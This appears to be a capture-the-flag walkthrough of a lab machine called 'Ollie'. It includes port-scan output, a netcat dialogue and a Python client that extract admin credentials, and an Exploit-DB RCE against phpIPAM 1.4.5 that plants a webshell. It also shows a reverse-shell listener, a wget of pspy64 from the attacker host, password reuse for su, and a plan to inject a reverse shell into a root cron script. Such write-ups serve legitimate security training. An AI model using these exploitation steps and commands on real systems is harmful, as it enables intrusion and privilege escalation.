```
RustScan: The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.165.63:22
Open 10.10.165.63:80
Open 10.10.165.63:1337
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 22:28 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating Ping Scan at 22:28
Scanning 10.10.165.63 [4 ports]
Completed Ping Scan at 22:28, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:28
Completed Parallel DNS resolution of 1 host. at 22:28, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:28
Scanning 10.10.165.63 [3 ports]
Discovered open port 80/tcp on 10.10.165.63
Discovered open port 22/tcp on 10.10.165.63
Discovered open port 1337/tcp on 10.10.165.63
Completed SYN Stealth Scan at 22:28, 0.34s elapsed (3 total ports)
Initiating Service scan at 22:28
Scanning 3 services on 10.10.165.63
Completed Service scan at 22:31, 164.88s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.165.63
Retrying OS detection (try #2) against 10.10.165.63
Initiating Traceroute at 22:31
Completed Traceroute at 22:31, 0.31s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:31
Completed Parallel DNS resolution of 2 hosts. at 22:31, 0.01s elapsed
DNS resolution of 2 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 10.10.165.63.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:31
Completed NSE at 22:31, 8.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:31
Completed NSE at 22:31, 1.61s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:31
Completed NSE at 22:31, 0.00s elapsed
Nmap scan report for 10.10.165.63
Host is up, received echo-reply ttl 63 (0.30s latency).
Scanned at 2023-07-06 22:28:57 EDT for 181s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b71ba8f88c8a4a5355c02e8901f25669 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDP5+l/iCTR0Sqa4q0dIntXiVyRE5hsnPV5UfG4D+sQKeM4XoG7mzycPzJxn9WkONCwgmLWyFD1wHOnexqtxEOoyCrHhP2xGz+5sOsJ7RbpA0KL/CAUKs2aCtonKUwg5FEhOjUy945M0e/DmstbOYx8od6603eb4TytHfxQHPPiWBBRCmg6e+5UjcHLSOqDEzXkDOmmLieiE008fEVrNAmF2J+I4XPJI7Usaf3IzpnaFm3Ca9YvNAr4t8gpDST2uNuRWA9NCMspBFEj/5YQfjOnYx2cSSZHUP3lK8tiwc/RWSk7OBTXYOBncyV4lw8OiyJ1fOhr/2gXTXE/tWQvu1zKWYYafMKRdsH6nuE5nZ0CK3pLHe/nUgIsVPl7sJ3QlqJF7Wd5OmY3e4Py7movqFm/HmW+zjwsXGHnzENC47N+RxV0XTYCxbKzTAZDo5gLMxmsbXWnQmU5GMk0e9sh7HHybmWWkKKYJiOp+3yM9vTPXPiNXBeJmvWa01hoAAi+3OU=
|   256 4e2743b6f454f918d038dacd769b8548 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFL/P1VyyCYVY2aUZcXTLmHkiXGo4/KdJptRP7Wioy78Sb/W/bKDAq3Yl6a6RQW7KlGSbZ84who5gWwVMTSTt2U=
|   256 1482cabb04e501839cd654e9d1fac482 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHmTKDYCCJVK6wx0kZdjLd1YZeLryW/qXfKAfzqN/UHv
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Ollie :: login
|_Requested resource was http://10.10.165.63/index.php?page=login
|_http-favicon: Unknown favicon MD5: 851615F43921F017A297184922B4FBFD
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/ /immaolllieeboyyy
1337/tcp open  waste?  syn-ack ttl 62
| fingerprint-strings:
|   DNSStatusRequestTCP, GenericLines:
|     Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
|     What is your name? What's up,
|     It's been a while. What are you here for?
...
```
Port 1337 stands out: nmap could not match the service (`waste?`), but the fingerprint shows a chatty plain-text banner. Note also that its TTL is 62 while ports 22 and 80 report 63, a hint that this service sits one hop further away, for example inside a container. Let's talk to it directly with netcat (nc).
```
nc 10.10.165.63 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
What is your name?
meow
What's up, Meow! It's been a while. What are you here for?
meow
Ya' know what? Meow. If you can answer a question about me, I might have something for you.

What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf?
Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie... Please hold on a minute

Ok, I'm back. After a lengthy discussion, we've come to the conclusion that you are the right person for the job. Here are the credentials for our administration panel.

Username: admin
Password: Oxxxxxxxxxxxxxxy!

PS: Good luck and next time bring some treats!
```
We answered the question and were handed a username and password for an "administration panel". Next, port 80: it serves a login page, so we try the credentials we just obtained.
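The dialogue above can be scripted instead of typed by hand, which is useful when a lab resets and the credentials change. The following is an added example, not code from the original post: a small raw-socket client that answers Ollie's prompts and pulls the username and password out of the final message. The reply table ("meow" as the name, "Bulldog" as the breed) mirrors the session above; the sample closing message is constructed so the parser can be checked offline.

```python
import re
import socket
import sys

# Scripted replies, keyed by a phrase that appears in each prompt. "meow" is an
# arbitrary name, as in the session above; "Bulldog" is the answer the service accepted.
ANSWERS = [
    ("What is your name?", "meow"),
    ("What are you here for?", "meow"),
    ("What breed of dog am I?", "Bulldog"),
]

# The final message carries the panel credentials on two consecutive lines.
CRED_RE = re.compile(r"Username:\s*(\S+)\s+Password:\s*(\S+)")

# Constructed sample of the closing message (same shape as the real one), for offline testing.
SAMPLE_FINAL_MESSAGE = (
    "Ok, I'm back. Here are the credentials for our administration panel.\n\n"
    "Username: admin\n"
    "Password: Oxxxxxxxxxxxxxxy!\n\n"
    "PS: Good luck and next time bring some treats!\n"
)


def answer_for(prompt):
    """Return the scripted reply for a prompt, or None if it is not a question we handle."""
    for key, reply in ANSWERS:
        if key in prompt:
            return reply
    return None


def parse_credentials(text):
    """Extract (username, password) from the service output, or None if not present yet."""
    m = CRED_RE.search(text)
    return (m.group(1), m.group(2)) if m else None


def talk_to_ollie(host, port=1337, timeout=10.0):
    """Drive the dialogue over a raw TCP socket and return the credentials it hands out."""
    pending = ""      # text received since our last reply; a prompt may arrive in pieces
    transcript = ""   # everything received, searched for the credential block
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            chunk = s.recv(4096).decode(errors="replace")
            if not chunk:
                break
            pending += chunk
            transcript += chunk
            creds = parse_credentials(transcript)
            if creds:
                return creds
            reply = answer_for(pending)
            if reply:
                s.sendall((reply + "\n").encode())
                pending = ""
    return parse_credentials(transcript)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.165.63"
    print(talk_to_ollie(target))
```

Matching on a phrase of each prompt rather than on exact strings keeps the client working if the service wraps lines differently, and accumulating `pending` across reads handles prompts that arrive split over several TCP segments.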
The footer of the page shows that the application is phpIPAM v1.4.5. Exploit-DB has an authenticated RCE PoC for exactly this version: https://www.exploit-db.com/exploits/50963. It needs valid credentials, which we already have, and it drops a PHP webshell that we can use to obtain a reverse shell.
```
[...] Trying to login as admin
[+] Login successful!
[...] Exploiting
[+] Success! The shell is located at http://10.10.165.63/evil.php. Parameter: cmd
```

```
└─$ rlwrap nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.8.92.150] from (UNKNOWN) [10.10.165.63] 43716
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@hackerdog:/var/www/html$
```
In /home we find a user named "ollie". The password Ollie handed out on port 1337 may well be reused for the system account, so we try `su` with it.
```
www-data@hackerdog:/home$ su ollie
su ollie
Password: Oxxxxxxxxxxxxxxxy!

ollie@hackerdog:/home$ cd ollie
cd ollie
ollie@hackerdog:~$ ls
ls
user.txt
ollie@hackerdog:~$ cat user.txt
cat user.txt
THM{Oxxxxxxxxxxxxxxxxt}
ollie@hackerdog:~$
```
0x02 Privilege Escalation
Looking for SUID binaries and sudo rules turned up nothing, so we use pspy64 to watch for cron jobs and other processes that root starts. Download it from our attacking host:

```
wget http://10.8.92.150/pspy64
```
```
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/07/07 02:58:29 CMD: UID=0 PID=97 |
2023/07/07 02:58:29 CMD: UID=0 PID=96 |
```
After several minutes of observation we see root periodically executing "/bin/bash /usr/bin/feedme". Because root runs that script by path, anyone who can modify it gets code execution as root, so the next step is to confirm that ollie can write to it and, if so, inject a reverse shell.